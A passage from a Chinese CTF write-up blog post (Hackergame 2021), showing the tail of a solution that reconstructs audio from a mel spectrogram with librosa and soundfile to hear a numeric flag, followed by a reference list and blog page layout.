得到的数要加上-60才符合规矩</span></span><br><span class="line">    spectrogramT.append(res)</span><br><span class="line"></span><br><span class="line">spectrogram = np.array(spectrogramT).transpose() <span class="comment"># 得到的结果转置一下</span></span><br></pre></td></tr></table></figure>

<p>这样就得到了梅尔频谱图的数据，可以对 librosa 的部分进行逆过程了<br>翻 librosa 的文档，有 <code>power_to_db</code> 当然也就有 <code>db_to_power</code><br>而且类似于 melspectrogram 函数在 librosa.feature 中，可以专门看 <a target="_blank" rel="noopener" href="https://librosa.org/doc/latest/feature.html">feature 部分的文档</a><br>翻到了 inverse 部分，可以看到有一个函数 <code>librosa.feature.inverse.mel_to_audio</code> 可以直接把梅尔频谱图专为音频数据，所以就用它了：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">y = librosa.feature.inverse.mel_to_audio(</span><br><span class="line">    librosa.db_to_power(spectrogram), <span class="comment"># 乘二除二没什么大用，而且影响效果，就删了</span></span><br><span class="line">    sample_rate, n_iter=num_freqs, <span class="comment"># 采样率题目提供了，是 22050Hz</span></span><br><span class="line">    n_fft=fft_window_size,</span><br><span class="line">    hop_length=frame_step_size,</span><br><span class="line">    window=window_function_type,</span><br><span class="line">)</span><br></pre></td></tr></table></figure>

<p>这样就完成了还原，最后是输出，但是并没在 librosa 中找到音频输出的函数，所以就用了经典 <code>soundfile</code>：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> soundfile <span class="keyword">as</span> sf</span><br><span class="line">sf.write(<span class="string">&quot;flag.wav&quot;</span>, y, sample_rate)</span><br></pre></td></tr></table></figure>

<p>然后打开听就行了，题目说了是个 12 位数，所以剩下的就是英语听力了，翻译过来的数字就是 flag 了 </p>
<hr>
<p>基本上我觉得比较简单的也就这些了，剩下的令我破防的放下一篇_(:з」∠)_</p>
<h2 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h2><ul>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/holdon521/p/4686849.html">伪造http请求ip地址 - 博客园</a></li>
<li><a target="_blank" rel="noopener" href="https://graphql.cn/">GraphQL官网</a>、<a target="_blank" rel="noopener" href="https://www.electronjs.org/apps/graphiql">GraphiQL</a>、<a target="_blank" rel="noopener" href="https://apis.guru/graphql-voyager/">GraphQL Voyager</a></li>
<li><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/390876937">【安全记录】玩转GraphQL - DVGA靶场（上）- 知乎</a></li>
<li><a target="_blank" rel="noopener" href="https://librosa.org/doc/latest/index.html">librosa文档</a></li>
<li><a target="_blank" rel="noopener" href="https://pysoundfile.readthedocs.io/en/latest/">PySoundFile文档</a></li>
</ul>
<div style="display: flex; justify-content: space-between;">

<p><a href="/p/fd872e78.html">&lt; #1</a></p>
<p><a href="/p/f152ab1f.html">#3 &gt;</a></p>
</div></div><div class="article-licensing box"><div class="licensing-title"><p>「Hackergame 2021」#2 Writup 开局上分篇 1</p><p><a href="https://blog.tonycrane.cc/p/f54b44c.html">https://blog.tonycrane.cc/p/f54b44c.html</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>TonyCrane</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2021-10-29</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2021-10-29</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="article-tags is-size-7 mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/CTF/">CTF</a><a class="link-muted mr-2" rel="tag" href="/tags/Writeup/">Writeup</a></div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/p/f152ab1f.html"><i class="level-item fas fa-chevron-left"></i><span class="level-item">「Hackergame 2021」#3 Writup 持续破防篇 0</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/p/fd872e78.html"><span class="level-item">「Hackergame 2021」#1 Writup 开局上分篇 0</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><script src="https://giscus.app/client.js" data-repo="TonyCrane/TonyCrane.github.io" data-category="General" data-mapping="title" data-theme="light" data-lang="zh-CN" crossorigin="anonymous" async></script><script>const t = localStorage.getItem("theme")
const isDarkMode = window.matchMedia("(prefers-color-scheme: dark)").matches
const isLightMode = window.matchMedia("(prefers-color-scheme: light)").matches
const isNotSpecified = window.matchMedia("(prefers-color-scheme: no-preference)").matches
const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified
if (t === null) {
    if (isDarkMode) {
        var giscus = document.querySelector("script[src*=giscus]")
        giscus.setAttribute("data-theme", "https://gcore.jsdelivr.net/gh/TonyCrane/note/docs/css/giscus.css")
    } else if (isNotSpecified || hasNoSupport) {
        const now = new Date()
        const hour = now.getHours()
        const isNight = hour <= 6 || hour >= 18
        if (isNight) {
            var giscus = document.querySelector("script[src*=giscus]")
            giscus.setAttribute("data-theme", "https://gcore.jsdelivr.net/gh/TonyCrane/note/docs/css/giscus.css")
        }
    }
} else if (JSON.parse(t).value === "dark") {
    var giscus = document.querySelector("script[src*=giscus]")
    giscus.setAttribute("data-theme", "https://gcore.jsdelivr.net/gh/TonyCrane/note/docs/css/giscus.css")
}</script></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="/tonycrane.png" alt="鹤翔万里"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">鹤翔万里</p><p class="is-size-6 is-block">TonyCrane</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>Jilin -&gt; Hangzhou, China</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives"><p class="title">106</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories"><p class="title">14</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags"><p class="title">47</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://space.bilibili.com/171431343" target="_blank" rel="noopener">BiliBili主页</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/TonyCrane"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Notebook" href="https://note.tonycrane.cc/"><i class="fas fa-book"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="QQ" href="https://qm.qq.com/cgi-bin/qm/qr?k=IrHKn7S1NdpfCsCfxlIPe9_t0wuRAS3s&amp;noverify=0"><i class="fab fa-qq"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Email" href="mailto:tonycrane@foxmail.com"><i class="fas fa-envelope"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Telegram" href="https://t.me/TonyCraneSky"><i class="fab fa-telegram"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="RSS" href="/atom.xml"><i class="fas fa-rss"></i></a></div></div></div><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">最新文章</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2023-02-01T16:37:23.000Z">2023-02-02</time></p><p class="title"><a href="/p/dc8d460.html">「杂谈」由 PA 实验引发的一些思考</a></p><p class="categories"><a href="/categories/%E6%9D%82%E8%B0%88/">杂谈</a> / <a href="/categories/%E6%9D%82%E8%B0%88/%E5%AD%A6%E4%B9%A0/">学习</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-10-26T21:18:19.000Z">2022-10-27</time></p><p class="title"><a href="/p/169d9f3d.html">「Hackergame 2022」#3 Writup 囤囤囤 1</a></p><p class="categories"><a href="/categories/Writeup/">Writeup</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-10-26T21:18:13.000Z">2022-10-27</time></p><p class="title"><a href="/p/4fd94ed.html">「Hackergame 2022」#2 Writup 囤囤囤 0</a></p><p class="categories"><a href="/categories/Writeup/">Writeup</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-10-26T21:13:38.000Z">2022-10-27</time></p><p class="title"><a href="/p/c8afb596.html">「Hackergame 2022」#1 Writup 开局杀题</a></p><p class="categories"><a href="/categories/Writeup/">Writeup</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-10-26T20:43:30.000Z">2022-10-27</time></p><p class="title"><a href="/p/630bfdd5.html">「Hackergame 2022」#0 赛后总结</a></p><p class="categories"><a href="/categories/Writeup/">Writeup</a></p></div></article></div></div><div class="card widget" data-type="archives"><div class="card-content"><div class="menu"><h3 class="menu-label">归档</h3><ul class="menu-list"><li><a class="level is-mobile" href="/archives/2023/02/"><span class="level-start"><span class="level-item">二月 2023</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/10/"><span class="level-start"><span class="level-item">十月 2022</span></span><span class="level-end"><span class="level-item tag">4</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/09/"><span class="level-start"><span class="level-item">九月 2022</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/06/"><span class="level-start"><span class="level-item">六月 2022</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/02/"><span class="level-start"><span class="level-item">二月 2022</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/01/"><span class="level-start"><span class="level-item">一月 2022</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/12/"><span class="level-start"><span class="level-item">十二月 2021</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/11/"><span class="level-start"><span class="level-item">十一月 2021</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/10/"><span class="level-start"><span class="level-item">十月 2021</span></span><span class="level-end"><span class="level-item tag">7</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/08/"><span class="level-start"><span class="level-item">八月 2021</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/07/"><span class="level-start"><span class="level-item">七月 2021</span></span><span class="level-end"><span class="level-item tag">8</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/06/"><span class="level-start"><span class="level-item">六月 2021</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/05/"><span class="level-start"><span class="level-item">五月 2020</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/04/"><span class="level-start"><span class="level-item">四月 2020</span></span><span class="level-end"><span class="level-item tag">26</span></span></a></li><li><a class="level is-mobile" href="/archives/2019/11/"><span class="level-start"><span class="level-item">十一月 2019</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2019/09/"><span class="level-start"><span class="level-item">九月 2019</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2019/08/"><span class="level-start"><span class="level-item">八月 2019</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2019/06/"><span class="level-start"><span class="level-item">六月 2019</span></span><span class="level-end"><span class="level-item tag">4</span></span></a></li><li><a class="level is-mobile" href="/archives/2019/05/"><span class="level-start"><span class="level-item">五月 2019</span></span><span class="level-end"><span class="level-item tag">9</span></span></a></li><li><a class="level is-mobile" href="/archives/2019/04/"><span class="level-start"><span class="level-item">四月 2019</span></span><span class="level-end"><span class="level-item tag">4</span></span></a></li><li><a class="level is-mobile" href="/archives/2019/03/"><span class="level-start"><span class="level-item">三月 2019</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2019/01/"><span class="level-start"><span class="level-item">一月 2019</span></span><span class="level-end"><span class="level-item tag">24</span></span></a></li></ul></div></div></div><div class="card widget" data-type="tags"><div class="card-content"><div class="menu"><h3 class="menu-label">标签</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/AtCoder/"><span class="tag">AtCoder</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/CSP-S/"><span class="tag">CSP-S</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/CTF/"><span class="tag">CTF</span><span class="tag">16</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Cpp/"><span class="tag">Cpp</span><span class="tag">67</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Haskell/"><span class="tag">Haskell</span><span class="tag">11</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Linux/"><span class="tag">Linux</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Luogu/"><span class="tag">Luogu</span><span class="tag">5</span></a></div><div class="control"><a class="tags has-addons" href="/tags/NOIp/"><span class="tag">NOIp</span><span class="tag">33</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Python/"><span class="tag">Python</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Rust/"><span class="tag">Rust</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/SPOJ/"><span class="tag">SPOJ</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Writeup/"><span class="tag">Writeup</span><span class="tag">11</span></a></div><div class="control"><a class="tags has-addons" href="/tags/bfs/"><span class="tag">bfs</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/blog/"><span class="tag">blog</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/bug/"><span class="tag">bug</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/dsu-on-tree/"><span class="tag">dsu on tree</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/git/"><span class="tag">git</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/github/"><span class="tag">github</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/hexo/"><span class="tag">hexo</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/manim/"><span class="tag">manim</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/markdown/"><span class="tag">markdown</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/mkdocs/"><span class="tag">mkdocs</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/python/"><span class="tag">python</span><span class="tag">5</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%9B%BE%E8%AE%BA/"><span class="tag">图论</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%AD%A6%E4%B9%A0/"><span class="tag">学习</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%B7%A6%E5%81%8F%E6%A0%91/"><span class="tag">左偏树</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%B7%AE%E5%88%86%E7%BA%A6%E6%9D%9F/"><span class="tag">差分约束</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%B9%B6%E6%9F%A5%E9%9B%86/"><span class="tag">并查集</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/"><span class="tag">数据结构</span><span class="tag">4</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%95%B0%E8%AE%BA/"><span class="tag">数论</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%9C%80%E5%A4%A7%E6%B5%81/"><span class="tag">最大流</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%9C%80%E7%9F%AD%E8%B7%AF/"><span class="tag">最短路</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%9D%82%E8%B0%88/"><span class="tag">杂谈</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%A0%91%E7%8A%B6%E6%95%B0%E7%BB%84/"><span class="tag">树状数组</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%B8%B8%E8%AE%B0/"><span class="tag">游记</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E7%8A%B6%E6%80%81%E5%8E%8B%E7%BC%A9/"><span class="tag">状态压缩</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E7%94%9F%E6%B4%BB/"><span class="tag">生活</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E7%AC%94%E8%AE%B0/"><span class="tag">笔记</span><span class="tag">29</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E7%AE%97%E6%B3%95/"><span class="tag">算法</span><span class="tag">32</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E7%BA%BF%E6%AE%B5%E6%A0%91/"><span class="tag">线段树</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E7%BD%91%E7%BB%9C%E6%B5%81/"><span class="tag">网络流</span><span class="tag">22</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E8%8C%83%E7%95%B4%E8%AE%BA/"><span class="tag">范畴论</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E8%8E%AB%E9%98%9F/"><span class="tag">莫队</span><span class="tag">5</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E8%AE%A1%E7%AE%97%E5%87%A0%E4%BD%95/"><span class="tag">计算几何</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E8%B4%B9%E7%94%A8%E6%B5%81/"><span class="tag">费用流</span><span class="tag">10</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E9%9A%8F%E7%AC%94/"><span class="tag">随笔</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E9%A2%98%E8%A7%A3/"><span class="tag">题解</span><span class="tag">36</span></a></div></div></div></div></div><div class="card widget" data-type="categories"><div class="card-content"><div class="menu"><h3 class="menu-label">分类</h3><ul class="menu-list"><li><a class="level is-mobile" href="/categories/C-%E7%AE%97%E6%B3%95/"><span class="level-start"><span class="level-item">C++算法</span></span><span class="level-end"><span class="level-item tag">32</span></span></a><ul><li><a class="level is-mobile" href="/categories/C-%E7%AE%97%E6%B3%95/%E7%AC%94%E8%AE%B0/"><span class="level-start"><span class="level-item">笔记</span></span><span class="level-end"><span class="level-item tag">11</span></span></a><ul><li><a class="level is-mobile" href="/categories/C-%E7%AE%97%E6%B3%95/%E7%AC%94%E8%AE%B0/%E5%9B%BE%E8%AE%BA/"><span class="level-start"><span class="level-item">图论</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/C-%E7%AE%97%E6%B3%95/%E7%AC%94%E8%AE%B0/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/"><span class="level-start"><span class="level-item">数据结构</span></span><span class="level-end"><span class="level-item tag">4</span></span></a></li></ul></li></ul></li><li><a class="level is-mobile" href="/categories/Writeup/"><span class="level-start"><span class="level-item">Writeup</span></span><span class="level-end"><span class="level-item tag">11</span></span></a></li><li><a class="level is-mobile" href="/categories/manim/"><span class="level-start"><span class="level-item">manim</span></span><span class="level-end"><span class="level-item tag">3</span></span></a><ul><li><a class="level is-mobile" href="/categories/manim/%E7%AC%94%E8%AE%B0/"><span class="level-start"><span class="level-item">笔记</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li></ul></li><li><a class="level is-mobile" href="/categories/%E6%9D%82%E8%B0%88/"><span class="level-start"><span class="level-item">杂谈</span></span><span class="level-end"><span class="level-item tag">1</span></span></a><ul><li><a class="level is-mobile" href="/categories/%E6%9D%82%E8%B0%88/%E5%AD%A6%E4%B9%A0/"><span class="level-start"><span class="level-item">学习</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li></ul></li><li><a class="level is-mobile" href="/categories/%E6%B8%B8%E8%AE%B0/"><span class="level-start"><span class="level-item">游记</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/%E7%94%9F%E6%B4%BB/"><span class="level-start"><span class="level-item">生活</span></span><span class="level-end"><span class="level-item tag">3</span></span></a><ul><li><a class="level is-mobile" href="/categories/%E7%94%9F%E6%B4%BB/%E6%9D%82%E8%B0%88/"><span class="level-start"><span class="level-item">杂谈</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li></ul></li><li><a class="level is-mobile" href="/categories/%E9%A2%98%E8%A7%A3/"><span class="level-start"><span class="level-item">题解</span></span><span class="level-end"><span class="level-item tag">33</span></span></a><ul><li><a class="level is-mobile" href="/categories/%E9%A2%98%E8%A7%A3/%E7%BD%91%E7%BB%9C%E6%B5%8124%E9%A2%98/"><span class="level-start"><span class="level-item">网络流24题</span></span><span class="level-end"><span class="level-item tag">24</span></span></a></li></ul></li></ul></div></div></div><div class="column-right-shadow is-hidden-widescreen is-sticky"></div></div><div class="column column-right is-4-tablet is-4-desktop is-3-widescreen is-hidden-touch is-hidden-desktop-only order-3 is-sticky"><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#FLAG-助力大红包"><span class="level-left"><span class="level-item">1</span><span class="level-item">FLAG 助力大红包</span></span></a></li><li><a class="level is-mobile" href="#图之上的信息"><span class="level-left"><span class="level-item">2</span><span class="level-item">图之上的信息</span></span></a></li><li><a class="level is-mobile" href="#赛博厨房"><span class="level-left"><span class="level-item">3</span><span class="level-item">赛博厨房</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#Level-0"><span class="level-left"><span class="level-item">3.1</span><span class="level-item">Level 0</span></span></a></li><li><a class="level is-mobile" href="#Level-1"><span class="level-left"><span class="level-item">3.2</span><span class="level-item">Level 1</span></span></a></li></ul></li><li><a class="level is-mobile" href="#助记词"><span class="level-left"><span class="level-item">4</span><span class="level-item">助记词</span></span></a></li><li><a class="level is-mobile" href="#p😭q"><span class="level-left"><span class="level-item">5</span><span class="level-item">p😭q</span></span></a></li><li><a class="level is-mobile" href="#Reference"><span class="level-left"><span class="level-item">6</span><span class="level-item">Reference</span></span></a></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/BlogLogo.png" alt="TonyCrane&#039;s Blog" height="28"></a><p class="is-size-7"><span>&copy; 2023 TonyCrane</span><br>Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> with theme <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a> modified by <a href="https://github.com/TonyCrane" target="_blank" rel="noopener">TonyCrane</a><br><span id="busuanzi_container_site_uv">共<span id="busuanzi_value_site_uv">0</span>个访客</span></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="fab fa-creative-commons-nc"></i></a></p></div></div></div></div></footer><script src="https://gcore.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://gcore.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://gcore.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-CN");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><!--!--><script src="https://gcore.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "此网站使用Cookie来改善您的体验。",
          dismiss: "知道了！",
          allow: "允许使用Cookie",
          deny: "拒绝",
          link: "了解更多",
          policy: "Cookie政策",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://gcore.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script><script src="https://gcore.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script type="text/x-mathjax-config">MathJax.Hub.Config({
            'HTML-CSS': {
                matchFontHeight: false
            },
            SVG: {
                matchFontHeight: false
            },
            CommonHTML: {
                matchFontHeight: false
            },
            tex2jax: {
                inlineMath: [
                    ['$','$'],
                    ['\\(','\\)']
                ]
            }
        });</script><script src="https://gcore.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><script src="/js/darkmode.js"></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>